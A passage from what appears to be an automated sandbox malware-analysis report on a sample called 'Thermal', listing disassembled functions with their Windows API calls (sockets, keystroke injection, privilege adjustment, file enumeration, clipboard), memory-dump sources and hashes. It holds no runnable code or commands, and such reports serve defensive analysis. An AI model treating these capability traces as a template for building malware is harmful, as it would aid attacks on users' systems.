                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007F0E82
                                                • RegCloseKey.ADVAPI32(00000000), ref: 007F0E8F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                • String ID:
                                                • API String ID: 1240663315-0
                                                • Opcode ID: 7cadcfdfbd24a85f15129f6089698520f953eaf45a45c0e6780289b7b9219494
                                                • Instruction ID: 7b397809ab43630b7e9ab929d78811a1b25570e095095042f41271f9a78e563a
                                                • Opcode Fuzzy Hash: 7cadcfdfbd24a85f15129f6089698520f953eaf45a45c0e6780289b7b9219494
                                                • Instruction Fuzzy Hash: 13E13A71204214EFCB14EF25C895E2ABBE9EF89714F04896DF949DB362DA34E901CB91
                                                APIs
                                                • __swprintf.LIBCMT ref: 007D4451
                                                • __swprintf.LIBCMT ref: 007D445E
                                                  • Part of subcall function 007938C8: __woutput_l.LIBCMT ref: 00793921
                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 007D4488
                                                • LoadResource.KERNEL32(?,00000000), ref: 007D4494
                                                • LockResource.KERNEL32(00000000), ref: 007D44A1
                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 007D44C1
                                                • LoadResource.KERNEL32(?,00000000), ref: 007D44D3
                                                • SizeofResource.KERNEL32(?,00000000), ref: 007D44E2
                                                • LockResource.KERNEL32(?), ref: 007D44EE
                                                • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007D454F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                • String ID:
                                                • API String ID: 1433390588-0
                                                • Opcode ID: 66ca1e44739a7b823ccabf518ce40b280085016c80ef91204ace50762af33562
                                                • Instruction ID: 9e58948659f9e8fa2296819beae02d78ac3bf3dcbcb6d89d8cd9adfcb1634282
                                                • Opcode Fuzzy Hash: 66ca1e44739a7b823ccabf518ce40b280085016c80ef91204ace50762af33562
                                                • Instruction Fuzzy Hash: 94317E7150125AABDF119FA0EC49EBB7BB8FF04301F004826F916D6251EB78DA61CBB0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                • String ID:
                                                • API String ID: 1737998785-0
                                                • Opcode ID: 6be783b75bbcd7985c2ce6de17fe8b969f084bfc684a80e93f4e48ed5b234e60
                                                • Instruction ID: 5a8e88fd8cd5bbae52288570fe0f658254f2c06f46fcefa298c2d325fa5c0573
                                                • Opcode Fuzzy Hash: 6be783b75bbcd7985c2ce6de17fe8b969f084bfc684a80e93f4e48ed5b234e60
                                                • Instruction Fuzzy Hash: 8B219131205250EFDB51AF25EC09F2E77A9FF98711F008019F94A9B261CB39AD00CF95
                                                APIs
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007DFA83
                                                • FindClose.KERNEL32(00000000), ref: 007DFB96
                                                  • Part of subcall function 007752B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007752E6
                                                • Sleep.KERNEL32(0000000A), ref: 007DFAB3
                                                • _wcscmp.LIBCMT ref: 007DFAC7
                                                • _wcscmp.LIBCMT ref: 007DFAE2
                                                • FindNextFileW.KERNEL32(?,?), ref: 007DFB80
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                • String ID: *.*
                                                • API String ID: 2185952417-438819550
                                                • Opcode ID: e6a6986a285fe0ebc5c9aa1fc846eb4f9e1b346e77c37398920f0f6f92a99510
                                                • Instruction ID: 041429db76404c4aa29c9b2ec19bbfddb8b00ff239347ffada9bc777d72e0d18
                                                • Opcode Fuzzy Hash: e6a6986a285fe0ebc5c9aa1fc846eb4f9e1b346e77c37398920f0f6f92a99510
                                                • Instruction Fuzzy Hash: 4C4170B194021A9FCF14DF64CC59AEEBBB8FF05350F548167E819A2291EB389E45CF90
                                                APIs
                                                  • Part of subcall function 007C9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C93E3
                                                  • Part of subcall function 007C9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C9410
                                                  • Part of subcall function 007C9399: GetLastError.KERNEL32 ref: 007C941D
                                                • ExitWindowsEx.USER32(?,00000000), ref: 007D57B4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                • String ID: $@$SeShutdownPrivilege
                                                • API String ID: 2234035333-194228
                                                • Opcode ID: 77fa3dc330809d3d1c27983f88b77a31547152811cedd9d79a65ea27466869f1
                                                • Instruction ID: b1c999189ad5600f9ea08af4e31665447676f41227cd8bf244a0ad1243f54cb3
                                                • Opcode Fuzzy Hash: 77fa3dc330809d3d1c27983f88b77a31547152811cedd9d79a65ea27466869f1
                                                • Instruction Fuzzy Hash: E601F731751712EBE76862A49C8EFBB7778EB04770F34002BF913D22D2DA685C008550
                                                APIs
                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007E69C7
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E69D6
                                                • bind.WSOCK32(00000000,?,00000010), ref: 007E69F2
                                                • listen.WSOCK32(00000000,00000005), ref: 007E6A01
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E6A1B
                                                • closesocket.WSOCK32(00000000,00000000), ref: 007E6A2F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                • String ID:
                                                • API String ID: 1279440585-0
                                                • Opcode ID: 263ed1a43b9b069f197d9e9d4d37f140cd4494f2e598be590cb48165a927049f
                                                • Instruction ID: cf8312b2dd2087edc50563581911f1cecff112f6444106add1216f27743ddd30
                                                • Opcode Fuzzy Hash: 263ed1a43b9b069f197d9e9d4d37f140cd4494f2e598be590cb48165a927049f
                                                • Instruction Fuzzy Hash: D6219170600604DFCB50EF64CC49B6EB7A9EF48760F14C569E95AA7391CB78AC01CB91
                                                APIs
                                                  • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 00771DD6
                                                • GetSysColor.USER32(0000000F), ref: 00771E2A
                                                • SetBkColor.GDI32(?,00000000), ref: 00771E3D
                                                  • Part of subcall function 0077166C: DefDlgProcW.USER32(?,00000020,?), ref: 007716B4
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ColorProc$LongWindow
                                                • String ID:
                                                • API String ID: 3744519093-0
                                                • Opcode ID: 4b1ea1bb7b606ffbc45aa69047cca9dce068632fb0e838aefa70bd8029e6d779
                                                • Instruction ID: bcbe69ac337071af7e32b8414d0688de4443a78c4f5051de83951cb26d526c3a
                                                • Opcode Fuzzy Hash: 4b1ea1bb7b606ffbc45aa69047cca9dce068632fb0e838aefa70bd8029e6d779
                                                • Instruction Fuzzy Hash: 3DA17CB0305408FADF3C6B6D4C49E7B255EEB82381F94C60AF509D5182CA2DDD01DB75
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 007DC329
                                                • _wcscmp.LIBCMT ref: 007DC359
                                                • _wcscmp.LIBCMT ref: 007DC36E
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 007DC37F
                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 007DC3AF
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                • String ID:
                                                • API String ID: 2387731787-0
                                                • Opcode ID: 03fc90a074d7d4efbc9e1ed01ddc2435d05eeea597238ffcb6b973f51a6563ff
                                                • Instruction ID: 0cb071ff5d46cf231230197d72d287112c8b6f4a232a95bc02ba35af4a54471a
                                                • Opcode Fuzzy Hash: 03fc90a074d7d4efbc9e1ed01ddc2435d05eeea597238ffcb6b973f51a6563ff
                                                • Instruction Fuzzy Hash: F1518935604602CFD715DF68D494AAAB7E8FF49320F10861EE95ACB3A1DB38AD05CB91
                                                APIs
                                                  • Part of subcall function 007E8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007E84A0
                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007E6E89
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E6EB2
                                                • bind.WSOCK32(00000000,?,00000010), ref: 007E6EEB
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E6EF8
                                                • closesocket.WSOCK32(00000000,00000000), ref: 007E6F0C
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                • String ID:
                                                • API String ID: 99427753-0
                                                • Opcode ID: ad4ea584d76a8af8a8a2c852a302c4342d13e71ae3cf76b62cf86999e8ebecaa
                                                • Instruction ID: 3362a015bb197b51cbeb8119b50da4b303183dc377c90e9646091b2f912456fc
                                                • Opcode Fuzzy Hash: ad4ea584d76a8af8a8a2c852a302c4342d13e71ae3cf76b62cf86999e8ebecaa
                                                • Instruction Fuzzy Hash: 4E41A275700214EFDF20AF649C8AF6E77A8EB48750F04C558FA59AB3D2DB789D008B91
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                • String ID:
                                                • API String ID: 292994002-0
                                                • Opcode ID: 24cfeb951b01e72b2579a46bca282bd1e0f6c651eceb7fa05e2c6fc320665990
                                                • Instruction ID: 5b133b7e595ab629ac2b2321df30444571014090c74fd16f4f5e1cadc6a2b59f
                                                • Opcode Fuzzy Hash: 24cfeb951b01e72b2579a46bca282bd1e0f6c651eceb7fa05e2c6fc320665990
                                                • Instruction Fuzzy Hash: 1D118672300A159FEB215F26DC88B3A7B99FF44761F058129EA45D7341DB78AD118ED0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: LocalTime__swprintf
                                                • String ID: %.3d$WIN_XPe
                                                • API String ID: 2070861257-2409531811
                                                • Opcode ID: 39c53f23469173fcabb6e3c67fb83ff37c7666309e0c089257d288a37102ac76
                                                • Instruction ID: e32425fa2fdb5ee13f476c7b8e9934a9c5e3712eb849db186c88b9f70ee89b9a
                                                • Opcode Fuzzy Hash: 39c53f23469173fcabb6e3c67fb83ff37c7666309e0c089257d288a37102ac76
                                                • Instruction Fuzzy Hash: 19D01271804218EACB08AA90D848FFB737CFB04300F144052F546E2040D23D9798EB62
                                                APIs
                                                • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007E1ED6,00000000), ref: 007E2AAD
                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007E2AE4
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Internet$AvailableDataFileQueryRead
                                                • String ID:
                                                • API String ID: 599397726-0
                                                • Opcode ID: 7558d95bef27a403ab5894ae06de8d8a8909b468b74b5e63015dc1895a70cd27
                                                • Instruction ID: 75993a0a0cca3978998a533dc3406ad855c03f9f3956ae3f91e7a9b9d9233be1
                                                • Opcode Fuzzy Hash: 7558d95bef27a403ab5894ae06de8d8a8909b468b74b5e63015dc1895a70cd27
                                                • Instruction Fuzzy Hash: 90412971605249FFEB20DE56DC85EBB73BCEB44314F10806AFA01A3142E6799E429B60
                                                APIs
                                                  • Part of subcall function 00790FE6: std::exception::exception.LIBCMT ref: 0079101C
                                                  • Part of subcall function 00790FE6: __CxxThrowException@8.LIBCMT ref: 00791031
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C93E3
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C9410
                                                • GetLastError.KERNEL32 ref: 007C941D
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                • String ID:
                                                • API String ID: 1922334811-0
                                                • Opcode ID: 74a45804aabe274cd7dcdc95822172a4af89b5d4c2e084a8d61e3211136ab4a2
                                                • Instruction ID: 3336871be68c29f1f79260a5e363f6bf24b3a4a027c559152aab3c10b0b5969a
                                                • Opcode Fuzzy Hash: 74a45804aabe274cd7dcdc95822172a4af89b5d4c2e084a8d61e3211136ab4a2
                                                • Instruction Fuzzy Hash: B51191B2414205AFD728DF54EC8AE2BB7BDFB44710B20852EF45993241EB74EC41CB60
                                                APIs
                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007D4271
                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 007D42B2
                                                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007D42BD
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CloseControlCreateDeviceFileHandle
                                                • String ID:
                                                • API String ID: 33631002-0
                                                • Opcode ID: 6c9f8d72f19bd2ed4dd533ef74c3a3f4f8af3ee4f38dc6096560f2aaedf440dc
                                                • Instruction ID: 1e198e8d611b819ead56fca744e51151f6a145850397039fc20487773a8fc1ee
                                                • Opcode Fuzzy Hash: 6c9f8d72f19bd2ed4dd533ef74c3a3f4f8af3ee4f38dc6096560f2aaedf440dc
                                                • Instruction Fuzzy Hash: 72113C75E01228BBDB608FA5EC45BAFBBBCFB45B60F104156FD04E7390C6745A018BA1
                                                APIs
                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 007D4F45
                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007D4F5C
                                                • FreeSid.ADVAPI32(?), ref: 007D4F6C
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                • String ID:
                                                • API String ID: 3429775523-0
                                                • Opcode ID: 92643a1f8b8aa35c43ce10b3757e72eae778d0bb91158a28567355c1a4c00bea
                                                • Instruction ID: b7db8dfd7ee21c7d9d56eb66976824ee7aff479899ec66fe71afb54cf1987e94
                                                • Opcode Fuzzy Hash: 92643a1f8b8aa35c43ce10b3757e72eae778d0bb91158a28567355c1a4c00bea
                                                • Instruction Fuzzy Hash: E9F04975A1130CBFEF00DFE0DC89AAEBBBCFF08201F0044A9A901E2290E7346A048B50
                                                APIs
                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 007D1B01
                                                • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 007D1B14
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: InputSendkeybd_event
                                                • String ID:
                                                • API String ID: 3536248340-0
                                                • Opcode ID: 58603dd1903cced3932d45beccbbffaf759559a335564e5d21b0afaa49a7b5c4
                                                • Instruction ID: 5970dc8b8b666f4ac481746d60e827d7d247bdb7110dd0f692055dc28f87f1b2
                                                • Opcode Fuzzy Hash: 58603dd1903cced3932d45beccbbffaf759559a335564e5d21b0afaa49a7b5c4
                                                • Instruction Fuzzy Hash: C2F0497190024DABDB04CF94C806BFE7BB4FF04315F00804AF955A6292D3799615DF94
                                                APIs
                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,007E9B52,?,0080098C,?), ref: 007DA6DA
                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,007E9B52,?,0080098C,?), ref: 007DA6EC
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ErrorFormatLastMessage
                                                • String ID:
                                                • API String ID: 3479602957-0
                                                • Opcode ID: e467a2131dc03d5dd099a7533cade232cf2e896675c13d63bb78a88688f252c2
                                                • Instruction ID: e05b4a3545082b4fa192048f0ee3a701161ab3090e1b8cde3190cb951c1750fc
                                                • Opcode Fuzzy Hash: e467a2131dc03d5dd099a7533cade232cf2e896675c13d63bb78a88688f252c2
                                                • Instruction Fuzzy Hash: B5F0823550522EFBDB21AFA4CC49FEA776CBF09761F008256B90896281DA349A40CFA1
                                                APIs
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007C8F27), ref: 007C8DFE
                                                • CloseHandle.KERNEL32(?,?,007C8F27), ref: 007C8E10
                                                Memory Dump Source
